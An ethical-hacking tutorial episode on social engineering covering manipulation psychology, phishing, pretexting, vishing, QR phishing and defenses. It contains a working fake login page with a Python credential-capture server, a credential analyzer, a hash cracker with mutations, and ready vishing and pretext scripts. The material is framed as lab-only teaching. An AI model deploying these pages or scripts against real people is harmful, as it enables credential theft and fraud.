Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
What will I learn
- Why social engineering is the most effective attack vector -- and why technology can't fully stop it;
- The psychology behind manipulation: authority, urgency, reciprocity, social proof;
- Phishing attacks: email, spear phishing, vishing (voice), smishing (SMS);
- Building a phishing page in your lab to understand how it works;
- Pretexting -- creating a believable cover story for information gathering;
- How AI is supercharging social engineering attacks at scale.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- Your hacking lab from Episode 2;
- Python 3 with the
http.servermodule (standard library); - The ambition to learn ethical hacking and security research.
Difficulty
- Beginner
Curriculum (of the Learn Ethical Hacking series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human (this post)
Solutions to Episode 7 Exercises
Exercise 1 -- Cracking Metasploitable2 shadow hashes:
Typical results from John the Ripper against Metasploitable2 /etc/shadow:
- msfadmin:msfadmin (cracked instantly -- in common wordlists)
- user:user (cracked instantly)
- postgres:postgres (cracked instantly -- service name = password)
- sys:batman (cracked in seconds -- common word)
- service:service (cracked instantly)
- klog:123456789 (cracked instantly -- #9 in rockyou.txt)
Total: 6-8 of ~15 accounts cracked within 60 seconds using rockyou.txt.
Most fell to dictionary attack; none required brute force.
The key insight: default and predictable passwords are the norm, not the exception. When the username IS the password (msfadmin:msfadmin, postgres:postgres), no cracking tool is even needed -- just try the obvious.
Exercise 2 -- Enhanced hash cracker with mutations:
import hashlib, sys
def mutations(word):
yield word
yield word.capitalize()
yield word + "1"
yield word + "123"
yield word + "!"
leet = word.replace('a','4').replace('e','3').replace('i','1').replace('o','0')
if leet != word:
yield leet
yield leet.capitalize()
def crack(target, wordlist, hash_type='md5'):
hash_fn = getattr(hashlib, hash_type)
attempts = 0
with open(wordlist, 'r', errors='replace') as f:
for line in f:
base = line.strip()
for candidate in mutations(base):
attempts += 1
if hash_fn(candidate.encode()).hexdigest() == target:
print(f"[+] CRACKED: {candidate} ({attempts:,} attempts)")
return candidate
print(f"[-] Not found in {attempts:,} attempts")
# Mutation typically increases crack rate by 15-30% over plain wordlist
The key insight: rule-based mutations dramatically expand coverage. "password" is in every wordlist, but "P4ssword!" might not be -- yet a simple set of mutation rules catches it. Hashcat's rule engine does this at GPU speed with hundreds of mutation rules.
Exercise 3 -- bcrypt vs MD5 speed comparison:
import bcrypt, hashlib, time
# MD5: ~2,000,000 hashes/sec in pure Python
# bcrypt cost 12: ~4 hashes/sec in Python
# If MD5 cracks "sunshine" (position 14) in 0.001 seconds:
# That's ~14,000 hashes/sec (Python, single thread)
# bcrypt at 4 hashes/sec: 14 attempts = 3.5 seconds
# For rockyou.txt (14.3M entries):
# MD5: ~14.3M / 14,000 = ~1,021 seconds (~17 minutes)
# bcrypt: ~14.3M / 4 = ~3,575,000 seconds (~41 DAYS)
The key insight: bcrypt doesn't make cracking impossible -- it makes it economically infeasible. The same wordlist that takes 17 minutes against MD5 takes 41 days against bcrypt. Per hash. Multiply by the number of users in a breach, and the attacker's cost becomes astronomical.
Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
We've spent seven episodes learning to attack computers. Now we attack the thing that's MUCH easier to exploit: the person sitting in front of the computer.
Social engineering is the art of manipulating humans into performing actions or divulging information. It bypasses every firewall, every encryption layer, every intrusion detection system -- because it targets the one component you can't patch: the human brain.
Here's the reality check: in over 90% of successful breaches, the initial compromise involves some form of social engineering. Not zero-days. Not exotic exploits. A human clicked something they shouldn't have, told someone something they shouldn't have, or did something they shouldn't have done. Remember those passwords from last episode? Turns out the easiest way to get them often isn't cracking -- it's asking.
Waarom hacken als je gewoon kunt vragen?
The Psychology of Manipulation
Social engineering exploits predictable psychological patterns. Robert Cialdini identified six principles of influence that attackers weaponize daily:
1. Authority -- People comply with requests from perceived authority figures. An email from "IT Support" or "the CEO" triggers compliance before critical thinking kicks in. Attackers impersonate authority figures, IT departments, executives, lawyers, law enforcement. If you think YOU would never fall for this -- you're exactly the person who would, because overconfidence is its own vulnerability.
2. Urgency -- "Your account will be suspended in 24 hours" -- panic overrides analysis. Attackers create artificial time pressure so victims act before they think. Every phishing email you've ever seen uses this. The moment you feel rushed, that's the moment to slow down.
3. Reciprocity -- If someone does something for you, you feel obligated to return the favor. "I helped you recover your account, could you just verify your credentials for me?" The favor was fake. The obligation feels real.
4. Social Proof -- "Everyone in the department has already updated their credentials" -- if others did it, it must be safe. Attackers reference colleagues or departments to normalize the unusual request.
5. Scarcity -- "Only 3 spots left in the beta program" -- fear of missing out drives hasty decisions. Limited-time offers. Exclusive access. Special invitation. All designed to bypass the "wait, is this legitimate?" moment.
6. Liking/Trust -- We comply with people we like. Attackers build rapport, find common interests (from your social media -- remember episode 4 on recon?), mirror your communication style. That friendly new contractor who seems to know everyone? Could be a pretexting exercise.
These aren't obscure academic concepts. They're the exact mechanics behind every successful phishing campaign, every pretexting call, every CEO fraud wire transfer. And unlike software vulnerabilities, you can't deploy a patch for human psychology.
Phishing: The Attack That Scales
Phishing is social engineering delivered via electronic communication -- usually email, but also SMS (smishing), voice calls (vishing), and messaging platforms.
The anatomy of a phishing email:
From: IT Security <[email protected]> <-- spoofed sender
Subject: URGENT: Password Expires in 2 Hours <-- urgency + authority
Dear [name], <-- personalization
Our security system has detected unusual activity on your account.
Your password will expire in 2 hours unless you verify your identity.
Click here to verify: https://yourcompany-secure.com/verify
^^ attacker-controlled domain (looks similar!)
If you do not verify within 2 hours, your account will be suspended
and you will need to contact IT support to regain access.
Best regards,
IT Security Team
YourCompany, Inc.
Everything about this looks legitimate. The sender appears correct (email spoofing is trivial without DMARC -- we covered DNS and email infrastructure in episode 3). The domain looks close enough. The urgency is believable. And the link goes to a page that looks IDENTICAL to the real login page.
Let's look at how the attacker registered that domain. Domain squatting techniques are more creative than you'd expect:
Legitimate domain: yourcompany.com
Typosquat: yourconpany.com (m -> n, adjacent keys)
Homograph: yourcompany.com (Cyrillic 'o' looks identical)
Subdomain trick: yourcompany.secure-login.com
TLD swap: yourcompany.net
Hyphenation: your-company.com
Double letter: yourcomppany.com
Any of these might fool a busy employee scanning their inbox at 4:47 PM on a Friday. And that's exactly when attackers send these -- end of day, end of week, when attention is lowest and urgency to "just deal with it" is highest.
Spear phishing targets specific individuals with personalized content. Instead of "Dear User," it's "Hi Jan, regarding the Q4 budget review we discussed Thursday" -- using information gathered during reconnaissance (episode 4). The success rate goes from ~3% (mass phishing) to 30-60% (well-crafted spear phishing). Having said that, even the 3% rate for mass phishing is profitable at scale -- send a million emails and you've got 30,000 victims.
Building a Phishing Page (Lab Only)
Let's build one in our lab to understand exactly how it works. On your Kali VM:
(html comment removed: ~/phishing-lab/index.html )
<!DOCTYPE html>
<html>
<head>
<title>DVWA - Login</title>
<style>
body { font-family: Arial; background: #2b2b2b; color: white;
display: flex; justify-content: center; align-items: center;
height: 100vh; margin: 0; }
.login-box { background: #3c3c3c; padding: 40px; border-radius: 8px;
width: 320px; }
input { width: 100%; padding: 10px; margin: 8px 0; box-sizing: border-box;
border: 1px solid #555; background: #2b2b2b; color: white; }
button { width: 100%; padding: 12px; background: #e74c3c; color: white;
border: none; cursor: pointer; font-size: 16px; margin-top: 10px; }
h2 { text-align: center; }
</style>
</head>
<body>
<div class="login-box">
<h2>DVWA Login</h2>
<form action="/capture" method="POST">
<input type="text" name="username" placeholder="Username" required>
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Login</button>
</form>
</div>
</body>
</html>
Now the credential capture server:
#!/usr/bin/env python3
"""
Phishing credential capture server -- LAB USE ONLY.
Demonstrates how phishing pages work. NEVER use against real targets.
"""
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import parse_qs
import os
import datetime
LOG_FILE = os.path.expanduser("~/phishing-lab/captured.txt")
class PhishHandler(SimpleHTTPRequestHandler):
def do_POST(self):
length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(length).decode()
params = parse_qs(body)
username = params.get('username', [''])[0]
password = params.get('password', [''])[0]
timestamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
entry = f"[{timestamp}] {self.client_address[0]} -- {username}:{password}\n"
with open(LOG_FILE, 'a') as f:
f.write(entry)
print(f"[+] Captured: {username}:{password}")
# Redirect to real site (victim thinks login failed, tries again on real page)
self.send_response(302)
self.send_header('Location', 'http://192.168.56.101/dvwa/login.php')
self.end_headers()
def do_GET(self):
if self.path == '/' or self.path == '/index.html':
self.path = '/index.html'
super().do_GET()
os.chdir(os.path.expanduser("~/phishing-lab"))
server = HTTPServer(('0.0.0.0', 8080), PhishHandler)
print("[*] Phishing server running on :8080")
server.serve_forever()
Run it:
mkdir -p ~/phishing-lab
# (save both files above)
python3 ~/phishing-lab/phish_server.py
Now open a browser on Kali and navigate to http://localhost:8080. You'll see a login page that looks like DVWA. Type credentials. They get captured to ~/phishing-lab/captured.txt and you're silently redirected to the real DVWA -- the victim thinks their first login attempt just failed.
That's it. That's phishing. A fake page, a capture script, a redirect. The complexity isn't in the technology -- it's in making the victim BELIEVE the page is real. The reconnaissance from episode 4 (knowing what services the target uses, what their login pages look like, what their email format is) is what makes phishing effective.
Let's also write a quick script to analyze captured credentials and check them against common password lists -- because in a real engagement, you'd want to know which users fell for it AND whether those same passwords appear in breach databases:
#!/usr/bin/env python3
"""
Analyze captured credentials from phishing lab.
Checks against common password list to assess password quality.
"""
import hashlib
def analyze_captures(capture_file, wordlist_path):
common_passwords = set()
with open(wordlist_path, 'r', errors='replace') as f:
for line in f:
common_passwords.add(line.strip())
print("[*] Analyzing captured credentials...\n")
with open(capture_file, 'r') as f:
for line in f:
# Format: [timestamp] IP -- user:pass
if ' -- ' not in line:
continue
creds = line.split(' -- ')[1].strip()
user, password = creds.split(':', 1)
in_wordlist = password in common_passwords
md5 = hashlib.md5(password.encode()).hexdigest()
print(f" User: {user}")
print(f" Password length: {len(password)}")
print(f" In common wordlist: {'YES -- weak!' if in_wordlist else 'No'}")
print(f" MD5 hash: {md5}")
print()
# Usage: analyze_captures("~/phishing-lab/captured.txt", "/usr/share/wordlists/rockyou.txt")
This connects back to episode 7 beautifully -- the passwords people type into phishing pages are the SAME passwords we'd be cracking from hash dumps. Two different attack paths, same human weakness at the root.
Pretexting: The Art of the Cover Story
Pretexting is creating a fabricated scenario to engage the victim. It's the in-person (or phone) equivalent of phishing.
Classic pretexts:
- IT Support: "Hi, this is James from IT. We're seeing some unusual activity on your account and need to verify your credentials to make sure you haven't been compromised."
- New Employee: "Hey, I just started last week in marketing. I'm having trouble accessing the shared drive -- could you remind me what the password is? Bob said you'd know."
- Vendor/Partner: "This is Sarah from [known vendor]. We need to update the payment information for next month's invoice. Can you confirm your finance portal login so I can verify the change?"
- Authority Figure: "This is David Chen, CTO. I need the AWS root credentials immediately -- we have a production outage and the ops team is unreachable. Email them to my personal address."
Each pretext is built from reconnaissance. You know the company structure (LinkedIn), the vendor names (press releases), the CTO's name (company website). The more detail you have, the more believable the pretext. This is exactly what we practiced in episode 4 -- OSINT isn't just about finding open ports, it's about finding the human information that makes social engineering credible.
The best pretexts share three properties: they give the attacker a plausible reason to be contacting the target, they create a reason for the target to share information, and they establish a timeframe that discourages verification. "I need this before the board meeting in 20 minutes" is more effective than "whenever you get a chance."
Vishing: Social Engineering by Phone
Vishing (voice phishing) is devastatingly effective because:
- Phone calls create urgency -- someone is waiting on the line
- Voice conveys authority and emotion that text can't
- People are less suspicious of phone calls than emails
- Caller ID is trivially spoofable
A vishing script:
[Ring ring]
Target: "Hello?"
Attacker: "Hi, this is Mike from the IT security team. Am I speaking
with [target name]?"
Target: "Yes, that's me."
Attacker: "Great. We detected a potential security incident involving
your account about 20 minutes ago. I need to verify a few things to
make sure your credentials weren't compromised. This should only take
a minute."
[Target is now in compliance mode -- authority + urgency engaged]
Attacker: "Can you confirm the email address associated with your account?"
[Starts with something the attacker already knows -- builds trust]
Target: "[confirms email]"
Attacker: "Perfect, that matches what I have. Now, were you logged in
around 2:15 PM today? We're seeing an unusual session."
Target: "Yes, I was working..."
Attacker: "OK, that might be you then. To rule out unauthorized access,
I need you to reset your password through our secure portal. I'll send
you a link now -- can you confirm you received it and click through?"
[Sends phishing link via email while on the phone]
Notice the structure: start with a question the attacker already knows the answer to (their email -- from OSINT in episode 4). When the target confirms correct information, it builds trust. "This person clearly has access to our systems, they must be legit." Then escalate to the actual request. The phone call is the delivery mechanism for the phishing link. It works because the target is already engaged, trusting, and primed to act by the conversation.
Smishing and QR Code Attacks
Smishing (SMS phishing) exploits the fact that SMS messages feel more personal and urgent than email. People check text messages immediately. And SMS has almost zero spam filtering compared to email:
[SMS from "Chase Bank"]
ALERT: Unusual transaction of $847.23 detected on your account
ending in 4521. If this was NOT you, visit:
chase-secure-verify.com/alert to lock your card immediately.
Reply STOP to cancel alerts.
The phone number is spoofed. The URL is attacker-controlled. The "Reply STOP" makes it feel like a real automated system. And because it's SMS, there's no email header analysis, no SPF check, no spam folder. It lands directly in the victim's messages right next to texts from family and friends.
QR code phishing (sometimes called "quishing") is the newest vector. Stick a malicious QR code on a parking meter, in a restaurant, on a fake company notice board:
#!/usr/bin/env python3
"""
Demonstrate QR code generation for phishing awareness training.
LAB USE ONLY -- never deploy malicious QR codes in the real world.
"""
# pip install qrcode pillow
import qrcode
# Legitimate URL
legit = qrcode.make("https://company-intranet.com/login")
legit.save("legit_qr.png")
# Phishing URL -- visually identical QR code, different destination
phish = qrcode.make("https://company-intranet.co/login")
phish.save("phish_qr.png")
# The two QR codes look completly different (different bit patterns)
# but both resolve to plausible-looking URLs.
# A human scanning either code sees a login page.
# Only one goes to the real site.
print("[*] Generated legit_qr.png and phish_qr.png")
print("[!] In real attacks, the phishing QR replaces the legitimate one")
People have been trained for years to be cautious about email links. Nobody questions a QR code on what appears to be an official sign. This is a growing problem -- the FBI issued an advisory about it in 2022 and the attack volume has only increased since then ;-)
AI and Social Engineering: The Force Multiplier
This is where episode 6 (AI Slop) connects directly to social engineering. AI tools are transforming the threat landscape in several ways:
Personalization at scale: AI can generate thousands of unique, personalized phishing emails from a template + target data. No more identical mass phishing that spam filters catch. Each email is linguistically unique, referencing details specific to that target scraped from LinkedIn, company websites, and social media.
Language quality: Non-native speakers used to be identifiable by grammar mistakes in phishing emails. The classic "Dear Esteemed Customer, We are needing you to verify..." was a reliable warning sign. AI generates flawless, native-sounding text in any language. That signal is gone.
Voice cloning: Services exist that clone a voice from a few seconds of audio. The "CTO" calling for emergency credentials might sound exactly like the real CTO -- because the attacker trained a voice model on their conference talk available on Youtube.
Deepfake video: Video calls for "identity verification" where the person on the other end looks and sounds like someone you know. In February 2024, a finance worker in Hong Kong transferred $25 million after a video call with deepfaked versions of their CFO and colleagues. Every person on the call was fake.
Twenty-five million dollars. Because a video call looked convincing.
This dramatically changes the economics of social engineering. A skilled pretexting attack used to require a talented human who could improvise on the phone, think on their feet, adapt to unexpected responses. That human could maybe do 10-20 vishing calls per day. With AI voice cloning, an attacker can run hundreds of simultaneous vishing calls, each perfectly mimicking the voice of a known authority figure. The cost per attack drops to near zero while the believability stays high.
The implications for defense are sobering. "Verify the caller's identity" used to mean "does this sound like someone you know?" That verification is now worthless against voice clones. We need to think about out-of-band verification -- calling back on a known number, using a pre-shared code word, requiring in-person confirmation for high-value actions. The old trust signals (voice, face, familiarity) can all be faked now.
Defense: What Actually Works
Technical defenses help but can't solve the problem alone:
- Email authentication (SPF, DKIM, DMARC with p=reject) -- prevents sender spoofing. We covered how DNS records work in episode 3 -- SPF and DKIM are DNS-based protections that verify the sender's identity at the mail server level.
- Phishing-resistant MFA (FIDO2/WebAuthn hardware keys) -- even if credentials are phished, the attacker can't use them without the physical key. This is the gold standard. Regular MFA (SMS codes, authenticator apps) can still be phished in real-time with tools like Evilginx that proxy the login and capture the session cookie.
- URL filtering and sandboxing -- catches known bad links and detonates suspicious attachments in isolated environments before delivery.
- Security awareness training -- but ONLY if it's continuous, realistic, and measured.
The uncomfortable truth about security awareness training: one-off annual training doesn't work. People forget within weeks. What works is ongoing simulated phishing campaigns where employees experience realistic attacks throughout the year, with immediate feedback when they click. Not as punishment -- as practice. Organizations that run monthly simulated phishing see click rates drop from ~30% to under 5% within a year. Organizations that do annual PowerPoint training see no measurable improvement.
The SINGLE most effective defense against phishing: pause. If an email creates urgency or fear, that IS the signal. Legitimate IT support will wait 10 minutes while you verify through a known channel. Legitimate executives don't demand credentials via personal email. The attack works because it bypasses your rational brain. The defense is to force the rational brain back into the loop.
And for the love of all that is holy -- stop reusing passwords across sites. We hammered this in episode 7 but it bears repeating in a social engineering context: if a phishing page captures your password and you use that same password on 15 other services... you just handed the attacker keys to everything. Use a password manager. Use unique passwords. Use MFA everywhere it's offered. These aren't inconveniences, they're the minimum viable personal security in 2026.
The Social Engineering Kill Chain
Let's put it all together. A sophisticated social engineering attack follows a predictable pattern, and understanding this pattern is the first step to defending against it:
1. Reconnaissance (Episode 4)
- OSINT on target organization and individuals
- LinkedIn, company website, social media, job postings
- Identify high-value targets (finance, IT admin, exec assistants)
2. Weaponization
- Build phishing infrastructure (domains, pages, email servers)
- Craft personalized pretexts from recon data
- Prepare payloads (credential harvester, malware dropper)
3. Delivery
- Send phishing emails / make vishing calls / plant QR codes
- Timing matters: end of day, before holidays, during crises
4. Exploitation
- Victim clicks link / enters credentials / opens attachment
- Credential captured or malware executes
5. Post-Exploitation
- Use captured credentials to access internal systems
- Pivot deeper into the network
- Exfiltrate data or deploy ransomware
Every step in this chain is a potential detection point. If your organization monitors for suspicious domain registrations (step 2), catches the phishing email in a sandbox (step 3), or detects the anomalous login from a new IP (step 4), the attack fails. Defense in depth isn't just a buzzword here -- it's literally the strategy of having multiple chances to catch the attack before it succeeds.
This brings us full circle to something we'll explore more when we cover cryptography and how data is actually protected on the wire. Because even after a succesful social engineering attack, proper encryption and key management can limit what the attacker can access. The layers work together -- social engineering bypasses the human layer, but technical controls can still protect the data layer. Layered security is the only security that works against humans.
Exercises
Exercise 1: Set up the phishing lab from this episode. Serve the fake login page on port 8080, then access it from the browser. After capturing test credentials, modify the page to clone a DIFFERENT login page -- try replicating the Metasploitable2 Apache default page or any web application login. Compare: how long did it take to make a convincing clone? What details matter most for believability (favicon, CSS, exact wording)?
Exercise 2: Write a Python script called phish_analyzer.py that takes a raw email file (.eml or plain text) and checks for phishing indicators: (a) mismatch between display name and actual sender address, (b) URLs where the displayed text doesn't match the actual href, (c) urgency keywords ("immediately", "suspended", "expires", "urgent", "verify"), (d) SPF/DKIM/DMARC results from email headers. Score the email from 0-10 on phishing likelihood. Test it against a phishing email you craft yourself.
Exercise 3: Design (on paper, do NOT execute) a spear phishing campaign against a fictional company "AcmeTech" with 500 employees. Using only public information sources (LinkedIn, company website, job postings, press releases), describe: (a) 3 employees you would target and why (job role, access level, likely tech savviness), (b) the pretext for each target, (c) the phishing page you would build, (d) how you would deliver the payload (email, phone, LinkedIn message). Then write the defense report: what could AcmeTech do to prevent each attack vector you identified?